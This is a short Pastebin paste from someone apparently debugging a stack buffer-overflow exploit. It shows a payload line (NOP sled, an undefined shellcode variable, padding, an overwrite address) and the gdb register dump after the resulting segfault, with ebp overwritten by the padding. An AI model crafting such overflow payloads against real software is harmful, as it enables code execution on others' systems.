Guest User

Untitled

a guest
Jan 21st, 2018
82
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.66 KB | None | 0 0
  1. crash = "\x90"*200 + shellcode + "\x43"*4090 + "\x77\x4e\x13\x08" + "C"*7
  2.  
  3. (gdb) info registers
  4. eax 0xffffffda -38
  5. ecx 0xbffff18c -1073745524
  6. edx 0x0 0
  7. ebx 0xc000018e -1073741426
  8. esp 0xbffff18c 0xbffff18c
  9. ebp 0x43434343 0x43434343
  10. esi 0x1 1
  11. edi 0x43434343 1128481603
  12. eip 0xb7dadb7a 0xb7dadb7a
  13. eflags 0x210286 [ PF SF IF RF ID ]
  14. cs 0x73 115
  15. ss 0x7b 123
  16. ds 0x7b 123
  17. es 0x7b 123
  18. fs 0x0 0
  19. gs 0x33 51
  20.  
  21. Program received signal SIGSEGV, Segmentation fault.
  22. 0xb7dadb7a in ?? ()
Add Comment
Please, Sign In to add comment